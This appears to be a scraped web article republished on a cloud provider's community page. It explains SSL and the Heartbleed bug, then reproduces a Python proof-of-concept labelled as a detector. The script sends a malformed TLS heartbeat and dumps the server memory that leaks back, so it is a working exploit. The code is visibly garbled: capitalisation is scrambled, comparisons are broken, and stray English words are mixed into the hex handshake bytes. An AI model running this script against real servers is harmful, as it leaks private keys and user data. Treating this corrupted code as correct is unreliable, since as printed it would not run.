A Python script-sharing _python to detect OpenSSL heart bleeding vulnerabilities

Source: Internet
Author: User
Tags 04x flush openssl ord socket python script ssl connection cve

What is SSL?

SSL is a popular encryption technology that protects the privacy information that users transmit over the Internet. After the website adopts this encryption technology, the third party cannot read any communication information between you and the website. In the background, data encrypted with SSL can only be decrypted by the receiver.

SSL was first introduced by Netscape in 1994 and has been adopted by all major browsers since the 1990.

What is a "heart bleed" loophole?

The SSL standard contains a heartbeat option that allows the computer at the end of the SSL connection to send a short message confirming that the computer on the other end is still online and getting feedback. The researchers found that it was possible to send malicious heartbeat messages through ingenious means, deceiving computers on the other end to divulge confidential information. The affected computer may be cheated and send information in the server's memory.

Who found out about this problem?

The flaw was discovered independently by researchers at Codenomicon and Google's security department. To minimize the impact, researchers have collaborated with the OpenSSL team and other key insiders to prepare for the fix before publishing the issue.

Python script for detecting OpenSSL heart bleeding vulnerabilities

Copy Code code as follows:

#!/usr/bin/python

# Quick and dirty demonstration of cve-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims the copyright to this source code.

Import Sys
Import struct
Import socket
Import time
Import Select
Import re
From Optparse import Optionparser

Options = Optionparser (usage= '%prog server [options] ', description= ' Test for SSL Heartbeat Vulnerability (CVE-2014-0160) ')
Options.add_option (' P ', '--port ', type= ' int ', default=443, help= ' TCP port to test (default:443) ')

def h2bin (x):
Return X.replace (', '). replace (' \ n ', '). Decode (' hex ')

Hello = H2bin (""
03 02 53 D8 DC
5b 9d 9b A8 0b BC 0c BC 2b MB CF
BD cc 0a (9f) D4 de 00
C0 C0 0a C0 C0 21 00 39 00 38 00 88
C0 C0 0f c0 C0-C0 1c
C0 1b C0 0d c0 0a c0 c0 09
C0 1f C0 1e 9a 00 99 00 45 00 44
C0 0e C0 2f c0 C0 modified C0 0c
C0 02 00 05 00 04 00 15 00 12 00 09 00 14 00-11
For the 0b 00 04 in the same
The 0a 0e 0d 00 19, the
0b 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12-00 13
0f 00 10 00 11 00 23 00 00
0f 00 01 01
''')

HB = H2bin (' "
18 03 02 00 03
01 40 00
''')

def hexdump (s):
For B in xrange (0, Len (s), 16):
Lin = [C for C in S[b:b + 16]]
Hxdat = '. Join ('%02x '% ord (c) for C in Lin)
Pdat = '. Join (c if <= Ord (c) <= 126 else '. ') For C in Lin)
print '%04x:%-48s%s '% (b, Hxdat, Pdat)
Print

def recvall (s, Length, timeout=5):
Endtime = time.time () + timeout
Rdata = ' '
remain = length
While remain > 0:
Rtime = Endtime-time.time ()
If Rtime < 0:
Return None
R, W, E = Select.select ([s], [], [], 5)
If s in R:
data = S.RECV (Remain)
# EOF?
If not data:
Return None
Rdata + + Data
Remain-= Len (data)
return Rdata


def recvmsg (s):
HDR = Recvall (S, 5)
If HDR is None:
print ' unexpected EOF receiving record header-server closed connection '
Return None, none, none
Typ, ver, ln = struct.unpack (' >bhh ', hdr)
Pay = Recvall (s, LN, 10)
If Pay is None:
print ' unexpected EOF receiving record payload-server closed connection '
Return None, none, none
print ' ... received message:type =%d, ver =%04x, length =%d '% (Typ, ver, len (pay))
Return Typ, ver, pay

def HIT_HB (s):
S.send (HB)
While True:
Typ, ver, pay = recvmsg (s)
If Typ is None:
print ' No heartbeat response received, server likely not vulnerable '
Return False

If Typ = 24:
print ' Received heartbeat response: '
Hexdump (Pay)
If Len (Pay) > 3:
print ' Warning:server returned more data than it Should-server is vulnerable! '
Else
print ' Server processed malformed heartbeat, but did not return any extra data. '
Return True

If Typ = 21:
print ' Received alert: '
Hexdump (Pay)
print ' Server returned error, likely not vulnerable '
Return False

def main ():
opts, args = Options.parse_args ()
If Len (args) < 1:
Options.print_help ()
Return

s = socket.socket (socket.af_inet, socket. SOCK_STREAM)
print ' Connecting ... '
Sys.stdout.flush ()
S.connect ((Args[0], opts.port))
print ' Sending Client Hello ... '
Sys.stdout.flush ()
S.send (Hello)
print ' Waiting for Server Hello ... '
Sys.stdout.flush ()
While True:
Typ, ver, pay = recvmsg (s)
If Typ = None:
print ' server closed connection without sending Server Hello. '
Return
# Look for server hello do message.
if Typ = = Ord (pay[0]) = = 0x0e:
Break

print ' Sending heartbeat request ... '
Sys.stdout.flush ()
S.send (HB)
HIT_HB (s)

if __name__ = = ' __main__ ':
Main ()

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.